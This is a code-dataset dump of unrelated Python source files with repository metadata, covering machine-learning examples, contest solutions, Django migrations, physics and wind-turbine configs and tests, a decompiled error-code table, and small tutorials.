return lambda *args, **kwargs: _cnn_to_mlp(convs, hiddens, dueling, layer_norm=layer_norm, *args, **kwargs)
def build_q_func(network, hiddens=[24], dueling=False, layer_norm=False, **network_kwargs):
if isinstance(network, str):
from baselines.common.models import get_network_builder
network = get_network_builder(network)(**network_kwargs)
def q_func_builder(input_placeholder, num_actions, scope, reuse=False):
with tf.variable_scope(scope, reuse=reuse):
print("Scope", scope, reuse, input_placeholder)
latent = network(input_placeholder)
if isinstance(latent, tuple):
if latent[1] is not None:
raise NotImplementedError("DQN is not compatible with recurrent policies yet")
latent = latent[0]
latent = layers.flatten(latent)
with tf.variable_scope("action_value"):
action_out = latent
# for hidden in hiddens:
# action_out = layers.fully_connected(action_out, num_outputs=hidden, activation_fn=None)
# if layer_norm:
# action_out = layers.layer_norm(action_out, center=True, scale=True)
# action_out = tf.nn.relu(action_out)
action_scores = layers.fully_connected(action_out, num_outputs=num_actions, activation_fn=None)
if dueling:
with tf.variable_scope("state_value"):
state_out = latent
# for hidden in hiddens:
# state_out = layers.fully_connected(state_out, num_outputs=hidden, activation_fn=None)
# if layer_norm:
# state_out = layers.layer_norm(state_out, center=True, scale=True)
# state_out = tf.nn.relu(state_out)
state_score = layers.fully_connected(state_out, num_outputs=1, activation_fn=None)
action_scores_mean = tf.reduce_mean(action_scores, 1)
action_scores_centered = action_scores - tf.expand_dims(action_scores_mean, 1)
q_out = state_score + action_scores_centered
else:
q_out = action_scores
return q_out
return q_func_builder
|
[
"[email protected]"
] | |
a28750d60b8ec5ca5296f66052472828b084a86a
|
293763954ad29020d68d17bb20b2ac8ce09b2412
|
/Learning & Documentation/Create Models in Tensorflow/linear_regression.py
|
de2ef0001bad013224eaa176c22b37be896378d2
|
[
"MIT"
] |
permissive
|
grebtsew/Object-and-facial-detection-in-python
|
b4371d86ca1b997c310c961b4eeb975af42a8f78
|
4ef987f1de7509876ca1e3588b2d6f4afaef2a75
|
refs/heads/master
| 2023-03-30T16:52:07.192025 | 2022-07-29T16:00:50 | 2022-07-29T16:00:50 | 122,378,661 | 17 | 5 |
MIT
| 2023-03-25T01:49:15 | 2018-02-21T18:52:07 |
Python
|
UTF-8
|
Python
| false | false | 3,681 |
py
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Linear regression using the LinearRegressor Estimator."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow as tf
import imports85 # pylint: disable=g-bad-import-order
STEPS = 1000
PRICE_NORM_FACTOR = 1000
def main(argv):
"""Builds, trains, and evaluates the model."""
#assert len(argv) == 1
(train, test) = imports85.dataset()
print(train)
print("-----")
print(test)
exit(0)
print("got dataset")
# Switch the labels to units of thousands for better convergence.
def to_thousands(features, labels):
return features, labels / PRICE_NORM_FACTOR
print("train")
train = train.map(to_thousands)
print("test")
test = test.map(to_thousands)
# Build the training input_fn.
def input_train():
return (
# Shuffling with a buffer larger than the data set ensures
# that the examples are well mixed.
train.shuffle(1000).batch(128)
# Repeat forever
.repeat().make_one_shot_iterator().get_next())
# Build the validation input_fn.
def input_test():
return (test.shuffle(1000).batch(128)
.make_one_shot_iterator().get_next())
feature_columns = [
# "curb-weight" and "highway-mpg" are numeric columns.
tf.feature_column.numeric_column(key="curb-weight"),
tf.feature_column.numeric_column(key="highway-mpg"),
]
# Build the Estimator.
model = tf.estimator.LinearRegressor(feature_columns=feature_columns)
# Train the model.
# By default, the Estimators log output every 100 steps.
model.train(input_fn=input_train, steps=STEPS)
# Evaluate how the model performs on data it has not yet seen.
eval_result = model.evaluate(input_fn=input_test)
# The evaluation returns a Python dictionary. The "average_loss" key holds the
# Mean Squared Error (MSE).
average_loss = eval_result["average_loss"]
# Convert MSE to Root Mean Square Error (RMSE).
print("\n" + 80 * "*")
print("\nRMS error for the test set: ${:.0f}"
.format(PRICE_NORM_FACTOR * average_loss**0.5))
# Run the model in prediction mode.
input_dict = {
"curb-weight": np.array([2000, 3000]),
"highway-mpg": np.array([30, 40])
}
predict_input_fn = tf.estimator.inputs.numpy_input_fn(
input_dict, shuffle=False)
predict_results = model.predict(input_fn=predict_input_fn)
# Print the prediction results.
print("\nPrediction results:")
for i, prediction in enumerate(predict_results):
msg = ("Curb weight: {: 4d}lbs, "
"Highway: {: 0d}mpg, "
"Prediction: ${: 9.2f}")
msg = msg.format(input_dict["curb-weight"][i], input_dict["highway-mpg"][i],
PRICE_NORM_FACTOR * prediction["predictions"][0])
print(" " + msg)
print()
if __name__ == "__main__":
# The Estimator periodically generates "INFO" logs; make these logs visible.
tf.logging.set_verbosity(tf.logging.INFO)
tf.app.run(main=main)
|
[
"[email protected]"
] | |
4e0dade735408ec02614201f3dce6b1d129075a7
|
a518141ca3ba2b6fa63a7961b51936d9438ff022
|
/10812 - Beat the Spread!.py
|
5d9944100b2a7760d5decf4054a94f3decb2b9c7
|
[] |
no_license
|
jlhung/UVA-Python
|
ec93b2c98e04c753e8356f3e4825584fae4a8663
|
7a0db4fecffd7ac4f377f93da41291a8e998ee9b
|
refs/heads/master
| 2022-11-28T04:47:49.270187 | 2020-08-10T13:19:58 | 2020-08-10T13:19:58 | 116,969,745 | 19 | 9 | null | null | null | null |
UTF-8
|
Python
| false | false | 182 |
py
|
n = int(input())
while n:
x, y = map(int, input().split())
if (x+y) % 2 or (x+y) < 0 or (x-y) < 0:
print("impossible")
else:
print(int((x+y) / 2), int((x-y) / 2))
n -= 1
|
[
"[email protected]"
] | |
62085bac7af2c75ef4995d947ebe57ef7dcf9cb2
|
44a2741832c8ca67c8e42c17a82dbe23a283428d
|
/cmssw/HeavyIonsAnalysis/JetAnalysis/python/jets/ak6CaloJetSequence_pPb_mix_cff.py
|
43faa9de8f5e464f8f33daa997f0ff65a0071833
|
[] |
no_license
|
yenjie/HIGenerator
|
9ff00b3f98b245f375fbd1b565560fba50749344
|
28622c10395af795b2b5b1fecf42e9f6d4e26f2a
|
refs/heads/master
| 2021-01-19T01:59:57.508354 | 2016-06-01T08:06:07 | 2016-06-01T08:06:07 | 22,097,752 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,457 |
py
|
import FWCore.ParameterSet.Config as cms
from PhysicsTools.PatAlgos.patHeavyIonSequences_cff import *
from HeavyIonsAnalysis.JetAnalysis.inclusiveJetAnalyzer_cff import *
ak6Calomatch = patJetGenJetMatch.clone(
src = cms.InputTag("ak6CaloJets"),
matched = cms.InputTag("ak6HiGenJetsCleaned")
)
ak6Caloparton = patJetPartonMatch.clone(src = cms.InputTag("ak6CaloJets"),
matched = cms.InputTag("hiGenParticles")
)
ak6Calocorr = patJetCorrFactors.clone(
useNPV = False,
# primaryVertices = cms.InputTag("hiSelectedVertex"),
levels = cms.vstring('L2Relative','L3Absolute'),
src = cms.InputTag("ak6CaloJets"),
payload = "AK6Calo_HI"
)
ak6CalopatJets = patJets.clone(jetSource = cms.InputTag("ak6CaloJets"),
jetCorrFactorsSource = cms.VInputTag(cms.InputTag("ak6Calocorr")),
genJetMatch = cms.InputTag("ak6Calomatch"),
genPartonMatch = cms.InputTag("ak6Caloparton"),
jetIDMap = cms.InputTag("ak6CaloJetID"),
addBTagInfo = False,
addTagInfos = False,
addDiscriminators = False,
addAssociatedTracks = False,
addJetCharge = False,
addJetID = False,
getJetMCFlavour = False,
addGenPartonMatch = True,
addGenJetMatch = True,
embedGenJetMatch = True,
embedGenPartonMatch = True,
embedCaloTowers = False,
embedPFCandidates = False
)
ak6CaloJetAnalyzer = inclusiveJetAnalyzer.clone(jetTag = cms.InputTag("ak6CalopatJets"),
genjetTag = 'ak6HiGenJetsCleaned',
rParam = 0.6,
matchJets = cms.untracked.bool(True),
matchTag = 'akVs6CalopatJets',
pfCandidateLabel = cms.untracked.InputTag('particleFlow'),
trackTag = cms.InputTag("generalTracks"),
fillGenJets = True,
isMC = True,
genParticles = cms.untracked.InputTag("hiGenParticles"),
eventInfoTag = cms.InputTag("hiSignal")
)
ak6CaloJetSequence_mc = cms.Sequence(
ak6Calomatch
*
ak6Caloparton
*
ak6Calocorr
*
ak6CalopatJets
*
ak6CaloJetAnalyzer
)
ak6CaloJetSequence_data = cms.Sequence(ak6Calocorr
*
ak6CalopatJets
*
ak6CaloJetAnalyzer
)
ak6CaloJetSequence_jec = ak6CaloJetSequence_mc
ak6CaloJetSequence_mix = ak6CaloJetSequence_mc
ak6CaloJetSequence = cms.Sequence(ak6CaloJetSequence_mix)
|
[
"[email protected]"
] | |
0ff42ffdcd69c859b093f5e2f320ba03debf77c8
|
fea9e7fc8b5ae1752a8917f415ddfcadc62ae540
|
/practice/week2/css-selector/sel_books.py
|
9e571bd96e24c0ce80be33267c1c92621b9eed3f
|
[] |
no_license
|
Dadajon/dl-with-big-data
|
fc85e0dd13aa857b89c9b707faabcfc69b51fe24
|
8e7b543948be0773550a114dc6467627c88e445f
|
refs/heads/main
| 2023-07-26T05:43:02.901241 | 2021-09-09T06:09:43 | 2021-09-09T06:09:43 | 328,919,918 | 1 | 2 | null | null | null | null |
UTF-8
|
Python
| false | false | 564 |
py
|
from bs4 import BeautifulSoup
fp = open("books.html", encoding='utf-8')
soup = BeautifulSoup(fp, 'html.parser')
sel = lambda q: print(soup.select_one(q).string)
sel("#nu") # id๋ก ์ฐพ๋ ๋ฐฉ๋ฒ
sel("li#nu") # id์ tag๋ก ์ฐพ๋ ๋ฐฉ๋ฒ
sel("ul > li#nu") # ๋ถ๋ชจ tag๋ก id์ tag๋ก ์ฐพ๋ ๋ฐฉ๋ฒ
sel("#bible #nu") # id๋ก ์๋์ id๋ฅผ ์ฐพ๋ ๋ฐฉ๋ฒ
sel("#bible > #nu") # id ๋ผ๋ฆฌ ๋ถ๋ชจ์์ ๊ด๊ณ๋ฅผ ๋ํ๋ธ๊ฒ
sel("ul#bible > li#nu") #
sel("li[id='nu']")
sel("li:nth-of-type(4)")
print(soup.select("li")[3].string)
print(soup.find_all("li")[3].string)
|
[
"[email protected]"
] | |
4dd2952b692d1eb7f9535151212982a8483654d6
|
0bf183f870d39037a254695b163c833512a826f8
|
/wapps/migrations/0016_auto_20161024_0925.py
|
5799f374b78a09d39052c63d158a41562f899572
|
[
"MIT"
] |
permissive
|
apihackers/wapps
|
47c57a762aec89bc398a152763a2b26005d8ffdc
|
e8158747aa3d77246d41142580faf9a5f2b0d968
|
refs/heads/master
| 2022-06-19T19:40:28.615502 | 2018-05-02T12:42:51 | 2018-05-02T12:42:51 | 59,942,417 | 7 | 2 |
MIT
| 2022-05-21T21:45:25 | 2016-05-29T12:40:01 |
Python
|
UTF-8
|
Python
| false | false | 723 |
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2016-10-24 09:25
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
from wapps.utils import get_image_model
class Migration(migrations.Migration):
dependencies = [
('wapps', '0015_identitysettings_amp_logo'),
]
operations = [
migrations.AlterField(
model_name='identitysettings',
name='amp_logo',
field=models.ForeignKey(blank=True, help_text='An mobile optimized logo that must be 600x60', null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=get_image_model(), verbose_name='Mobile Logo'),
),
]
|
[
"[email protected]"
] | |
12a314df473b007e01fcd646a5de9d22189aca4b
|
9b7d1472086eed304320312043a95610a39baf9c
|
/easy_maps/migrations/0001_initial.py
|
63a5e3ffb746437d92af2bbe813d7a74e7c6e4bc
|
[
"MIT"
] |
permissive
|
duct-tape/django-easy-maps
|
1831785952c5ef40028197d5ab618074b5a6053a
|
790196fcb5652a76a64f7f513c4c4ef4a1c905df
|
refs/heads/master
| 2020-05-28T05:14:18.312914 | 2019-04-21T04:40:29 | 2019-04-21T04:40:29 | 188,890,561 | 0 | 0 |
MIT
| 2019-05-27T18:20:17 | 2019-05-27T18:20:16 | null |
UTF-8
|
Python
| false | false | 1,103 |
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
]
operations = [
migrations.CreateModel(
name='Address',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('address', models.CharField(unique=True, max_length=255, verbose_name='address')),
('computed_address', models.CharField(max_length=255, null=True, verbose_name='computed address', blank=True)),
('latitude', models.FloatField(null=True, verbose_name='latitude', blank=True)),
('longitude', models.FloatField(null=True, verbose_name='longitude', blank=True)),
('geocode_error', models.BooleanField(default=False, verbose_name='geocode error')),
],
options={
'verbose_name': 'EasyMaps Address',
'verbose_name_plural': 'Address Geocoding Cache',
},
),
]
|
[
"[email protected]"
] | |
64ccdd263ca98e95b24a5cf753dcf440d430245d
|
10e1a046d2fb02d0742364c5d2ca3a40f9380416
|
/py_wake/tests/test_windturbines/test_generic_wind_turbines.py
|
0dec1eb35265b6ee19a256e891ed3db51e58c090
|
[
"MIT"
] |
permissive
|
Bowen-Du/PyWake
|
e1c407d4ff20101c95c28cd856faec729b414320
|
9a3c9a85f50082da01286b2dc8551a4e8f5fc037
|
refs/heads/master
| 2023-06-10T20:36:00.213649 | 2021-07-02T11:43:51 | 2021-07-02T13:14:51 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,371 |
py
|
from py_wake.examples.data.hornsrev1 import V80, Hornsrev1Site
from py_wake.wind_turbines._wind_turbines import WindTurbine
from py_wake.wind_turbines.generic_wind_turbines import GenericWindTurbine, GenericTIRhoWindTurbine
from py_wake.examples.data import wtg_path
from py_wake.examples.data.dtu10mw import DTU10MW
import numpy as np
import matplotlib.pyplot as plt
from py_wake.tests import npt
import pytest
from py_wake.deficit_models.noj import NOJ
from py_wake.site.xrsite import XRSite
def test_GenericWindTurbine():
for ref, ti, p_tol, ct_tol in [(V80(), .1, 0.03, .16),
(WindTurbine.from_WAsP_wtg(wtg_path + "Vestas V112-3.0 MW.wtg"), .05, 0.035, .07),
(DTU10MW(), .05, 0.06, .13)]:
power_norm = ref.power(np.arange(10, 20)).max()
wt = GenericWindTurbine('Generic', ref.diameter(), ref.hub_height(), power_norm / 1e3,
turbulence_intensity=ti, ws_cutin=None)
if 0:
u = np.arange(0, 30, .1)
p, ct = wt.power_ct(u)
plt.plot(u, p / 1e6, label='Generic')
plt.plot(u, ref.power(u) / 1e6, label=ref.name())
plt.ylabel('Power [MW]')
plt.legend()
ax = plt.twinx()
ax.plot(u, ct, '--')
ax.plot(u, ref.ct(u), '--')
plt.ylabel('Ct')
plt.show()
u = np.arange(5, 25)
p, ct = wt.power_ct(u)
p_ref, ct_ref = ref.power_ct(u)
# print(np.abs(p_ref - p).max() / power_norm)
npt.assert_allclose(p, p_ref, atol=power_norm * p_tol)
# print(np.abs(ct_ref - ct).max())
npt.assert_allclose(ct, ct_ref, atol=ct_tol)
@pytest.mark.parametrize(['power_idle', 'ct_idle'], [(0, 0), (100, .1)])
def test_GenericWindTurbine_cut_in_out(power_idle, ct_idle):
ref = V80()
power_norm = ref.power(15)
wt = GenericWindTurbine('Generic', ref.diameter(), ref.hub_height(), power_norm / 1e3,
turbulence_intensity=0, ws_cutin=3, ws_cutout=25, power_idle=power_idle, ct_idle=ct_idle)
if 0:
u = np.arange(0, 30, .1)
p, ct = wt.power_ct(u)
plt.plot(u, p / 1e6, label='Generic')
plt.plot(u, ref.power(u) / 1e6, label=ref.name())
plt.ylabel('Power [MW]')
plt.legend()
ax = plt.twinx()
ax.plot(u, ct, '--')
ax.plot(u, ref.ct(u), '--')
plt.ylabel('Ct')
plt.show()
assert wt.ct(2.9) == ct_idle
assert wt.power(2.9) == power_idle
assert wt.ct(25.1) == ct_idle
assert wt.power(25.1) == power_idle
def test_GenericTIRhoWindTurbine():
wt = GenericTIRhoWindTurbine('2MW', 80, 70, 2000, )
ws_lst = [11, 11, 11]
ti_lst = [0, .1, .2]
p11, ct11 = wt.power_ct(ws=ws_lst, TI_eff=ti_lst, Air_density=1.225)
p11 /= 1e6
if 0:
u = np.arange(3, 28, .1)
ax1 = plt.gca()
ax2 = plt.twinx()
for ti in ti_lst:
p, ct = wt.power_ct(u, TI_eff=ti, Air_density=1.225)
ax1.plot(u, p / 1e6, label='TI=%f' % ti)
ax2.plot(u, ct, '--')
ax1.plot(ws_lst, p11, '.')
ax2.plot(ws_lst, ct11, 'x')
print(p11.tolist())
print(ct11.tolist())
ax1.legend()
ax1.set_ylabel('Power [MW]')
ax2.set_ylabel('Ct')
plt.show()
npt.assert_array_almost_equal([1.833753, 1.709754, 1.568131], p11)
npt.assert_array_almost_equal([0.793741, 0.694236, 0.544916], ct11)
ws_lst = [10] * 3
rho_lst = [0.9, 1.225, 1.5]
p10, ct10 = wt.power_ct(ws=ws_lst, TI_eff=0.1, Air_density=rho_lst)
p10 /= 1e6
if 0:
u = np.arange(3, 28, .1)
ax1 = plt.gca()
ax2 = plt.twinx()
for rho in rho_lst:
p, ct = wt.power_ct(u, TI_eff=0.1, Air_density=rho)
ax1.plot(u, p / 1e6, label='Air density=%f' % rho)
ax2.plot(u, ct, '--')
ax1.plot(ws_lst, p10, '.')
ax2.plot(ws_lst, ct10, 'x')
print(p10.tolist())
print(ct10.tolist())
ax1.legend()
ax1.set_ylabel('Power [MW]')
ax2.set_ylabel('Ct')
plt.show()
npt.assert_array_almost_equal([1.040377569594173, 1.3934596754744593, 1.6322037609434554], p10)
npt.assert_array_almost_equal([0.7987480617157162, 0.7762418395479502, 0.7282996179383272], ct10)
|
[
"[email protected]"
] | |
01d3ab118c111cade14811b445555a634d2d86f8
|
2fd0c65aa0f72133f773dac5d9a5c48fe9e26fac
|
/Dsz/PyScripts/Lib/dsz/mca/file/cmd/logedit/errors.py
|
9078f31a6058462a9312fcb46aac6150a7228736
|
[] |
no_license
|
FingerLeakers/DanderSpritz_docs
|
f5d2430e0b86b1b2f0684f02ddd4fa973a5a7364
|
d96b6a71c039b329f9f81544f645857c75360e7f
|
refs/heads/master
| 2021-01-25T13:05:51.732149 | 2018-03-08T01:22:49 | 2018-03-08T01:22:49 | 123,527,268 | 2 | 0 | null | 2018-03-02T03:48:31 | 2018-03-02T03:48:30 | null |
UTF-8
|
Python
| false | false | 1,344 |
py
|
# uncompyle6 version 2.9.10
# Python bytecode 2.7 (62211)
# Decompiled from: Python 2.7.10 (default, Feb 6 2017, 23:53:20)
# [GCC 4.2.1 Compatible Apple LLVM 8.0.0 (clang-800.0.34)]
# Embedded file name: errors.py
import mcl.status
ERR_SUCCESS = mcl.status.MCL_SUCCESS
ERR_INVALID_PARAM = mcl.status.framework.ERR_START
ERR_MARSHAL_FAILED = mcl.status.framework.ERR_START + 1
ERR_GET_FULL_PATH_FAILED = mcl.status.framework.ERR_START + 2
ERR_OPENFILE_FAILED = mcl.status.framework.ERR_START + 3
ERR_ALLOC_FAILED = mcl.status.framework.ERR_START + 4
ERR_WRITE_FILE_FAILED = mcl.status.framework.ERR_START + 5
ERR_UNICODE_NOT_SUPPORTED = mcl.status.framework.ERR_START + 6
ERR_NO_GOOD_LINES_FOUND = mcl.status.framework.ERR_START + 7
ERR_NO_MATCHING_LINES_FOUND = mcl.status.framework.ERR_START + 8
errorStrings = {ERR_INVALID_PARAM: 'Invalid parameter(s)',
ERR_MARSHAL_FAILED: 'Marshaling data failed',
ERR_GET_FULL_PATH_FAILED: 'Get of full file path failed',
ERR_OPENFILE_FAILED: 'Open of file failed',
ERR_ALLOC_FAILED: 'Memory allocation failed',
ERR_WRITE_FILE_FAILED: 'Write to file failed',
ERR_UNICODE_NOT_SUPPORTED: 'Unicode is not supported on this platform',
ERR_NO_GOOD_LINES_FOUND: 'No good lines found for replacement of bad lines',
ERR_NO_MATCHING_LINES_FOUND: 'No lines found with the given phrase'
}
|
[
"[email protected]"
] | |
3ce562a5e5b5881b87d936099c74eb0efc486b7b
|
05de912d5579e031a8ccaeb9b8ea70f1431b82ad
|
/mopidy/audio/mixers/__init__.py
|
feaccc3d077f9d2b34cbf8dfeb1dad65870713f2
|
[
"Apache-2.0"
] |
permissive
|
cave-scorpion/mopidy
|
bcb0939ddacb0bd295ad36c2b073b369869a15cf
|
5d83e3e97a47efcfa62558ba57fd394b8c311aa6
|
refs/heads/master
| 2021-01-16T22:16:21.134218 | 2013-03-31T14:59:30 | 2013-03-31T14:59:30 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 479 |
py
|
from __future__ import unicode_literals
import pygst
pygst.require('0.10')
import gst
import gobject
from .auto import AutoAudioMixer
from .fake import FakeMixer
from .nad import NadMixer
def register_mixer(mixer_class):
gobject.type_register(mixer_class)
gst.element_register(
mixer_class, mixer_class.__name__.lower(), gst.RANK_MARGINAL)
def register_mixers():
register_mixer(AutoAudioMixer)
register_mixer(FakeMixer)
register_mixer(NadMixer)
|
[
"[email protected]"
] | |
e6ba65a1e4349381acba5c01404dcd17efb2c8d3
|
f023692f73992354a0b7823d9c49ae730c95ab52
|
/AtCoderBeginnerContest/1XX/186/E_another.py
|
5cd6db2ce83b44b90602978bdf66cc3d4f96d6b5
|
[] |
no_license
|
corutopi/AtCorder_python
|
a959e733f9a3549fab7162023e414ac2c99c4abe
|
a2c78cc647076071549e354c398155a65d5e331a
|
refs/heads/master
| 2023-08-31T09:40:35.929155 | 2023-08-20T06:19:35 | 2023-08-20T06:19:35 | 197,030,129 | 1 | 0 | null | 2022-06-22T04:06:28 | 2019-07-15T15:57:34 |
Python
|
UTF-8
|
Python
| false | false | 1,876 |
py
|
"""
ไปฅไธใๅ่ใซไฝๆ
https://twitter.com/kyopro_friends/status/1341216644727676928
s + k * x โก 0 mod n ใ่งฃใ(xใๆฑใใ).
้ณฅใฎๅทฃๅ็ใใ x <= n ใฎใใ,
x = im + j (0 <= i, j <= m = n**0.5)
ใจ่กจใใ.
j ใ 0 ๏ฝ m ใฎๆใฎไฝ็ฝฎ(s + k * j mod n)ใๅ่จ็ฎใ,mapใซๆใฃใฆใใ(jmap).
s + k * (im + j) โก 0 mod n
s + k * j + k * im โก 0 mod n
((s + k * j) mod n) + (k * im mod n) = n or 0 โก 0 mod n
ใจ่กจใใใใ, ใใ i ใซๅฏพใใฆ
(k * im mod n) + p = n or 0
ใจใชใใใใช p ใ jmap ใซๅญๅจใใฆใใใฐ, ใใฎๆใฎ im + j ใ็ญใใจใชใ.
ใใใ i ใ 0 ๏ฝ m ใฎ็ฏๅฒใงๅ
จๆข็ดขใ, ๅญๅจใใฆใใชใใใฐ -1 ใจใชใ.
@Baby-Step Giant-Step
"""
# import sys
# sys.setrecursionlimit(10 ** 6)
# import bisect
# from collections import deque
from collections import Counter
inf = float('inf')
mod = 10 ** 9 + 7
# from decorator import stop_watch
#
#
# @stop_watch
def solve(T, NSK):
for n, s, k in NSK:
m = int(n ** 0.5) + 1
jmap = {}
for j in range(m):
tmp = (s + k * j) % n
jmap.setdefault(tmp, j)
jmap[tmp] = min(j, jmap[tmp])
for i in range(m):
tmp = (n - (k * i * m) % n) % n
if jmap.get(tmp, - 1) >= 0:
print(i * m + jmap[tmp])
break
else:
print(-1)
if __name__ == '__main__':
T = int(input())
NSK = [[int(i) for i in input().split()] for _ in range(T)]
solve(T, NSK)
# # test
# from random import randint
# import tool.testcase as tt
# from tool.testcase import random_str, random_ints
# T = 100
# NSK = []
# for _ in range(T):
# N = randint(1, 10 ** 9)
# S = randint(1, N - 1)
# K = randint(1, 10 ** 9)
# NSK.append([N, S, K])
# solve(T, NSK)
|
[
"[email protected]"
] | |
a3b8e7c2bd30a297c6acbb500964593d46332088
|
3d82768d4f912eb940a1238a3b6347c727e52558
|
/expense/migrations/0004_auto_20201024_1825.py
|
83e59278f488ec0faee9c08743a0a6ee6c64bc63
|
[] |
no_license
|
surajit003/tdd-expense-app
|
b4dd53c1328f4dd40b39593e09f8afe9e811ff4a
|
603c6f56ce35944c1acf8deefd6d7b420576e65d
|
refs/heads/main
| 2023-01-08T16:01:42.102279 | 2020-11-08T20:47:04 | 2020-11-08T20:47:04 | 305,830,003 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 723 |
py
|
# Generated by Django 3.1.2 on 2020-10-24 18:25
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [("expense", "0003_auto_20201024_1816")]
operations = [
migrations.AlterField(
model_name="expense",
name="expense_id",
field=models.CharField(
default="d3ccef36-3709-4d60-b5fe-d673ee9d3933",
max_length=120,
primary_key=True,
serialize=False,
),
),
migrations.AlterField(
model_name="expense",
name="total",
field=models.FloatField(blank=True, null=True, verbose_name="Total"),
),
]
|
[
"[email protected]"
] | |
2e43ad66add5cc370ee3dc18b1754c8d45d8b1fe
|
31eaed64b0caeda5c5fe3603609402034e6eb7be
|
/ignorancia_zero/iz_aula-064 - programaรงรฃo orientada a objetos.py
|
e7aa8a74376c2e9fbd0ede1bee421dec1ba61654
|
[] |
no_license
|
RaphaelfsOliveira/workspace_python
|
93657b581043176ecffb5783de208c0a00924832
|
90959697687b9398cc48146461750942802933b3
|
refs/heads/master
| 2021-01-11T17:39:49.574875 | 2017-06-28T20:55:43 | 2017-06-28T20:55:43 | 79,814,783 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,418 |
py
|
# metodo especial construtor de objeto
# instancia o objeto
'__init__'
# devolve o objeto no formato de um dicionario
'__dict__'
# transforma o objeto em string, tem sempre que retornar uma string
'__str__'
# faz operaรงรตes com outra instancia do objeto somente com sinal + - / *
'__add__'
#imprime na tela a documentaรงรฃo escrita na classe do objeto instanciado
'__doc__'
class Conta(object):
'''O Objeto conta representa uma conta de banco'''
def __init__(self, ID, saldo):
'''metodo construtor do objeto'''
self.ID = ID
self.saldo = saldo
def __str__(self):
'''transforma o objeto em string'''
return 'ID: %d\nSaldo R$: %.2f' %(self.ID, self.saldo)
def __add__(self, outro):
'''faz operaรงรตes com outra instancia do objeto somente com sinal + - / *'''
self.saldo += outro.saldo
def __call__(self, x):
'''torna o objeto chamavel para realizar alguma operaรงรฃo'''
return x
bra = Conta(123, 5000)
ita = Conta(456, 8000)
print(bra.__dict__, '__dict__ devolve o objeto como dicionario')
print(bra.__doc__, '__doc__ documentaรงรฃo da classe do objeto')
'''
>>> class Pai:
pass
>>> class Filho(Pai):
pass
>>> class Neto(Filho):
pass
>>> issubclass(Pai, Filho)
False
>>> issubclass(Filho, Pai)
True
>>> Filho.__bases__
(<class '__main__.Pai'>,)
>>> Neto.__bases__
(<class '__main__.Filho'>,)
'''
|
[
"[email protected]"
] | |
bfb960beefa750bcc845e2efc49507af9740647a
|
52a61caff0aeb434c32e5657e38762643e9f57dd
|
/DataStructuresAndAlgorithms/SearchAndSort/Search/BinarySearch/functionBinarySearch.py
|
6a7e15608caca8460acd2988b9f9a53c5f770492
|
[] |
no_license
|
AndrewErmakov/PythonTrainingBasics
|
1480a6378d1ec59884760e2b3014ccc3d28f058f
|
639e15bbfc54da762cb9e366497754cfece30691
|
refs/heads/master
| 2021-06-10T15:57:58.682335 | 2021-03-25T13:37:30 | 2021-03-25T13:37:30 | 153,678,760 | 0 | 0 | null | 2018-10-30T13:52:51 | 2018-10-18T19:45:47 |
Python
|
UTF-8
|
Python
| false | false | 596 |
py
|
def binary_search(list_num: list, number: int) -> int:
"""ะัะฒะพะดะธั ะธะฝะดะตะบั ะทะฝะฐัะตะฝะธั, ะบะพัะพัะพะต ะผั ะธัะตะผ, ะธะฝะฐัะต ะฒัะฒะพะดะธััั ะะ ะะะะะะะ"""
low_border = 0
high_border = len(list_num) - 1
while low_border <= high_border:
mid = low_border + (high_border - low_border) // 2
guess = list_num[mid]
if guess == number:
return mid
if guess > number:
high_border = mid - 1
else:
low_border = mid + 1
return None
print(binary_search([1, 3, 5, 7, 9], 3))
|
[
"[email protected]"
] | |
06b82317f341de041aa076425ac0ea6a0b157357
|
fdb9b553a23647f7ea06f690613707c40b54902f
|
/src/main/resources/resource/LocalSpeech/LocalSpeech.py
|
3c699a5680887399d9993fd401bcfa08d5ebce64
|
[
"CC-BY-2.5",
"Apache-2.0"
] |
permissive
|
ShaunHolt/myrobotlab
|
d8d9f94e90457474cf363d36f4a45d396cfae900
|
92046d77abd560f0203050b3cccb21aa9df467f2
|
refs/heads/develop
| 2021-07-08T04:55:01.462116 | 2020-04-18T19:58:17 | 2020-04-18T19:58:17 | 122,795,957 | 0 | 0 |
Apache-2.0
| 2020-04-18T19:58:18 | 2018-02-25T01:37:54 |
Java
|
UTF-8
|
Python
| false | false | 886 |
py
|
#########################################
# LocalSpeech.py
# description: used as a general template
# categories: speech
# more info @: http://myrobotlab.org/service/LocalSpeech
#########################################
# start the service
mouth = Runtime.start('mouth','LocalSpeech')
#possible voices ( selected voice is stored inside config until you change it )
print ("these are the voices I can have", mouth.getVoices())
print ("this is the voice I am using", mouth.getVoice())
# ( macOs )
# set your voice from macos control panel
# you can test it using say command from terminal
# mouth.setVoice("Microsoft Zira Desktop - English (United States)")
mouth.speakBlocking(u"Hello this is an english voice")
mouth.speakBlocking(u"Bonjour ceci est une voix franรงaise, je teste les accents aussi avec le mot รฉlรฉphant")
mouth.setVolume(0.7)
mouth.speakBlocking("Silent please")
|
[
"[email protected]"
] | |
474938eddcd278b842c02f4bc13beab9969ae5d4
|
cbf448f9fa287b38a6b175040141e9ee445cfcd1
|
/DNN_3L/evaluation_matrics.py
|
cbb95bef1984a401aac76d2f267d039a67d8c78a
|
[] |
no_license
|
rnaimehaom/SST-Result
|
